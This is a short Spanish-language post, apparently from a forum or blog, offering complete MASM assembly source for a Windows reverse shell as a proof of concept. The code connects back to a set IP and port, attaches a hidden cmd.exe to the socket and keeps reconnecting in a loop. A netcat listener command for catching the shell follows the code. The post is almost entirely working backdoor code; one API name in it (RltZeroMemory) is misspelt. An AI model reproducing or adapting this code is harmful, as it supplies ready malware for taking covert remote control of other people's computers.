Esta es una pequeña y simple prueba de concepto de lo que sería una shell remota de conexión inversa programada con sintaxis MASM.
Aquí dejo el código:
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
includelib \masm32\lib\kernel32.lib
.data
cmd db "COMSPEC",0
ip db "127.0.0.1",0
szMsgCon db "/k echo: Connected...",0
port equ 7565
.data?
sinfo STARTUPINFO <>
pinfo PROCESS_INFORMATION <>
sockAddr sockaddr_in <>
wsaData WSADATA <>
sock SOCKET ?
szComspec db 512 dup(?)
.code
start:
invoke GetEnvironmentVariable,addr cmd,addr szComspec,512
__init_sock:
invoke WSAStartup, 202h, addr wsaData
invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0
mov [sock],eax
invoke inet_addr,addr ip
mov sockAddr.sin_family,AF_INET
mov sockAddr.sin_addr,eax
invoke htons,port
mov sockAddr.sin_port,ax
__connect:
invoke Sleep,500
invoke connect,[sock],addr sockAddr,sizeof sockAddr
cmp eax,-1
jz __connect
invoke RltZeroMemory, addr sinfo, sizeof sinfo
mov eax,[sock]
mov sinfo.cb,sizeof sinfo
mov sinfo.dwFlags,STARTF_USESTDHANDLES or STARTF_USESHOWWINDOW
mov sinfo.wShowWindow,SW_HIDE
mov sinfo.hStdOutput,eax
mov sinfo.hStdError,eax
mov sinfo.hStdInput,eax
invoke CreateProcess,addr szComspec,addr szMsgCon,0,0,TRUE,CREATE_NEW_CONSOLE,0,0,addr sinfo, addr pinfo
invoke WaitForSingleObject,pinfo.hProcess,INFINITE
invoke CloseHandle,pinfo.hThread
invoke CloseHandle,pinfo.hProcess
invoke closesocket,sock
invoke WSACleanup
jmp __init_sock
end start
Para probarlo, o podéis hacer pequeño script en python o perl o lo que sea que escuche en el puerto 7565 o mismo usar netcat, de la siguiente manera:
nc -l -p 7565
¡Un saludo!